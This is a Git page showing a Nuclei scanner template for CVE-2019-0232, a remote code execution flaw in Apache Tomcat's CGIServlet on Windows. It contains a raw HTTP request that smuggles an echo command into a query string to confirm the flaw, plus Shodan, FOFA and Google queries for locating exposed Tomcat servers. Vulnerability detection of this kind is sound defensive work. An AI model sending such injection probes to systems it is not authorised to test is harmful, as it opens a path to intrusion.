daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2019/CVE-2019-0232.yaml

62 lines
2.7 KiB
YAML
Raw Blame History

id: CVE-2019-0232
info:
name: Apache Tomcat `CGIServlet` enableCmdLineArguments - Remote Code Execution
author: DhiyaneshDk
severity: high
description: |
When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. The CGI option enableCmdLineArguments is disable by default in Tomcat 9.0.x (and will be disabled by default in all versions in response to this vulnerability). For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog (https-//codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html) and this archived MSDN blog (https-//web.archive.org/web/20161228144344/https-//blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/).
reference:
- http://packetstormsecurity.com/files/153506/Apache-Tomcat-CGIServlet-enableCmdLineArguments-Remote-Code-Execution.html
- http://seclists.org/fulldisclosure/2019/May/4
- https://access.redhat.com/errata/RHSA-2019:1712
- https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/
- https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2019-0232
cwe-id: CWE-78
epss-score: 0.97373
epss-percentile: 0.99927
cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
metadata:
vendor: apache
product: tomcat
shodan-query:
- http.html:"apache tomcat"
- http.title:"apache tomcat"
- http.html:"jk status manager"
- cpe:"cpe:2.3:a:apache:tomcat"
fofa-query:
- body="jk status manager"
- body="apache tomcat"
- title="apache tomcat"
google-query: intitle:"apache tomcat"
tags: cve,cve2019,packetstorm,seclists,apache,tomcat
variables:
sid: "{{rand_text_alpha(10)}}"
http:
- raw:
- |
GET /?&echo+{{sid}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{sid}}"
- type: word
part: content_type
words:
- "text/plain"
- type: status
status:
- 200
# digest: 490a0046304402202f871ff28f38f687dbe3c61173834dbcae004d726e798d4018f0afa313de6bf002206a2b7627cb7f83fcd701389d836b5a07b68911aa84b6e18609bb6a717906a70c:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink